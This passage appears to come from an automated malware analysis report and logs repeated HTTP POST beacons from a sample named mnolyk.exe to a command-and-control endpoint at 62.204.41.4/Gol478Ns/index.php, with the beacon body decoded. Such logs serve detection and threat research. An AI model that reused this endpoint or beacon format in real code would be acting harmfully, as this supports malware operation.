                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      598192.168.2.75029362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:43.101385117 CET713OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:43.169070959 CET713INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      599192.168.2.75029462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:43.344389915 CET714OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:43.409266949 CET714INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.74970062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:03.031560898 CET110OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:03.096266031 CET110INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      60192.168.2.74975562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:16.092891932 CET175OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:16.156837940 CET175INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      600192.168.2.75029562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:43.610527039 CET715OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:43.672183037 CET715INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      601192.168.2.75029662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:43.846360922 CET716OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:43.909090042 CET716INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      602192.168.2.75029762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:44.097127914 CET717OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:44.163500071 CET717INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      603192.168.2.75029862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:44.339808941 CET718OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:44.403513908 CET718INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      604192.168.2.75029962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:44.598784924 CET719OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:44.664676905 CET719INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      605192.168.2.75030062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:44.841607094 CET720OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:44.907110929 CET720INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      606192.168.2.75030162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:45.082072020 CET721OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:45.146536112 CET721INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      607192.168.2.75030262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:45.325484991 CET722OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:45.388547897 CET722INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      608192.168.2.75030362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:45.572465897 CET723OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:45.634674072 CET723INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      609192.168.2.75030462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:45.806701899 CET724OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:45.867981911 CET724INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      61192.168.2.74975662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:16.330636978 CET176OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:16.396106958 CET176INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      610192.168.2.75030562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:46.051156044 CET725OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:46.116750956 CET725INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      611192.168.2.75030662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:46.316046000 CET726OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:46.379158020 CET726INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      612192.168.2.75030762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:46.569596052 CET727OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:46.632174015 CET727INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      613192.168.2.75030862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:46.817929983 CET728OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:46.883155107 CET728INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      614192.168.2.75030962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:47.063196898 CET729OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
